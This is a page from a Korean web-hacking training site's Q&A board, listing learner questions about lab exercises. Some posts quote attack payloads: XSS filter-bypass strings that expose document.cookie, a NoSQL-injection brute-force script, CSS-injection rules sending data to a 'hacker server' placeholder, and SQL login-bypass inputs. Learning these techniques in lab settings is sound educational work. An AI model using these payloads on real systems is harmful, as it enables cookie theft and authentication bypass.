이런 주제는 어때요?
#웹해킹 #시스템해킹 #리버싱 #실습 #뉴비
Q&A
국내 최고 규모의 보안 커뮤니티에서 궁금한 내용을 질문해보세요!
궁금한것을 질문하세요
드림핵 강의나 워게임을 연결할 수 있어요.
인기 태그
#시스템해킹 #웹해킹 #리버싱
총 157개의 질문이 있습니다.
Answer
1
0
python execute
나도 궁금해요 0
안녕하세요 파이썬 코드가 실행이 안 되는데 어떻게 하면 실행할 수 있을까요?
Exercise: Blind SQL Injection
#웹해킹 #문제풀이
2 months ago
Answer
0
0
마지막 문제 오류
나도 궁금해요 0
다음 문제 눌러도 안 넘어가요 채점 실패라고 뜹니다.. 진행률 반영도 안 돼요
Background: Web
#웹해킹 #웹 #배경지식
3 months ago
Answer
0
1
실습 stage3 풀이 질문
나도 궁금해요 1
자바스크립트 함수 및 기워드 필터링 실습 Stage3에서 1번 code는 틀리고, location=/javascript:/.source + /alert/.source + [window[/al/.source + /ert/.source] + []]0 + /document.cookie/.source + [window[/al/.source + /ert/.source] + []]0 -- (1) 2번 code는 맞는 이유가 뭔가요? location=/javascript:/.source + /alert/.source + URL+0[12] + /document.cookie/.source + URL+0[13];
[WHA-C] Exploit Tech: XSS Filtering Bypass - II
#웹해킹 #심화 #xss
3 months ago
Answer
1
0
코드
나도 궁금해요 0
import requests, string HOST = 'http://localhost' ALPHANUMERIC = string.digits + string.ascii_letters SUCCESS = 'admin' flag = '' for i in range(32): for ch in ALPHANUMERIC: response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}') if response.text == SUCCESS: flag += ch break print(f'FLAG: DH{{{flag}}}') 이 코드는 어따 작성해야 하나요? 그리고 sql은 어디다가 입력해서 하는 공격인가요?
Exercise: NoSQL Injection
#웹해킹 #nosql #문제풀이
3 months ago
Answer
1
0
python 파일
나도 궁금해요 0
문제가 python파일로 작성되있는데 어떻게 html 들어가죠?
Exercise: Cookie
#웹해킹 #cookie #문제풀이
4 months ago
Answer
1
0
?
나도 궁금해요 0
로드맵이랑 똑같은데?
Introduction of Webhacking
#웹해킹
4 months ago
Answer
1
0
태그의 innerText value를 가져와 CSS Injection 공격이 가능할까요?
나도 궁금해요 0
태그의 innerText value를 가져와 CSS Injection 공격이 가능할까요? <style> spanclass=name { // * point color: red; background-image: url('hacker server'); } </style> <style> inputclass=name { color: red; background-image: url('hacker server'); } </style> <span class="name"> 1234 </span> <input class="test" value="abc"> 이런 코드가 있을 때 style 태그로만 1234의 값을 가지고 올 수 있을지 궁금합니다. 강의에서는 속성 값을 이용해서 가져오고, 구글에서 찾아봐도 보통 <span data-get="1234"> 1234 </span> span[data-get="1234"] { ... } 이런식으로 따로 또 속성을 정의해서 가져오더라구요. DOM으로 innerText라는 값에 의해서 읽을 수 있던데 document.getElementsByClassName("test")[0].innerText // '1234' CSS로는 태그의 innerText 값의 접근이 불가능할까요?
[WHA-C] Exploit Tech: CSS Injection
#웹해킹 #심화 #css_injection
5 months ago
Answer
1
0
[함께실습] NoSQL Injection
나도 궁금해요 0
[함께실습] NoSQL Injection 문제를 푸는 중인데 로드맵을 아무리 돌려봐도 이해도 안됩니다.. 그래서 혼자 풀기 너무 벅찬거 같아서 여러분들께 도움을 요청드려요 ㅠ
#웹해킹 #초보
6 months ago
Answer
0
0
실습페이지 소스
나도 궁금해요 0
실습페이지에서 개발자모드 들어가서 소스를 눌러 왼쪽 파일트리에서 js_debug.html파일을 열었는데 비어있네요..
Tools: Browser DevTools
#웹해킹 #도구
6 months ago
Answer
1
0
실습페이지
나도 궁금해요 0
실습페이지에서 소스코드가 안보이는데 어떻게 봐야하나요?
Tools: Browser DevTools
#웹해킹 #도구
7 months ago
Answer
1
0
onload -> onerror 오타 제보
나도 궁금해요 0
"이벤트 핸들러 속성" 3페이지에서 figure 2. 4행에 onload가 아닌 onerror가 맞을 것 같습니다.
[WHA-C] Exploit Tech: XSS Filtering Bypass - I
#웹해킹 #심화 #xss
7 months ago
Answer
1
0
오타 제보
나도 궁금해요 0
챕터1 2페이지에 Relative Path Overwrite (PRO) 라고 오타가 있습니다. RPO로 수정이 필요합니다.
[WHA-C] Exploit Tech: Relative Path Overwrite
#웹해킹 #심화 #rpo
7 months ago
Answer
1
0
리버스 쉘 질문이 있습니다.
나도 궁금해요 0
서버측 방화벽의 inbound가 80번 only, outbound가 허술할 때, 네트워크 아웃바운드 or 리버스 쉘을 사용해서 서버에서 공격자 측으로 tcp연결을 한다고 했는데, 이럴 경우에 서버에서 공격자한테는 데이터 전송이 되는데 공격자측에서 서버로는 방화벽에 막혀서 명령어 전송을 못하지 않나요?
Server-side Advanced - Command Injection
#웹해킹
7 months ago
Answer
1
0
웹해킹을 하기 위해 알아야 할 언어
나도 궁금해요 0
안녕하세요 웹해킹을 하고 있는 중인데 이해하기 너무 힘들어서요... 혹시 필수적으로 알아야 할 언어들 알려주실 수 있나요?
Introduction of Webhacking
#웹해킹
8 months ago
Answer
1
0
이번 강의에 딸린 퀴즈 3번의 답이 잘 이해가 안 됩니다.
나도 궁금해요 0
SELECT *FROM accounts WHERE user_id='admin' and user_pw='(A)' 에서 (A)에 들어갈 수 있는 로그인 우회 방법을 모두 고르라는 퀴즈 말인데, 답에 '+(select user_pw from accounts where user_id='admin')+' 이 포함되더군요. 하고자하는 의미는 이해가 가는데 SQL DML 명령문에 '+'나 '('가 포함되어도 되는지 의아합니다. 굳이 있어야 하는지도요. 그냥 ' select user_pw from accounts where user_id='admin'' 이런 식으로 하는건 안되는 걸까요?
ServerSide: SQL Injection
#웹해킹 #서버 #sql
8 months ago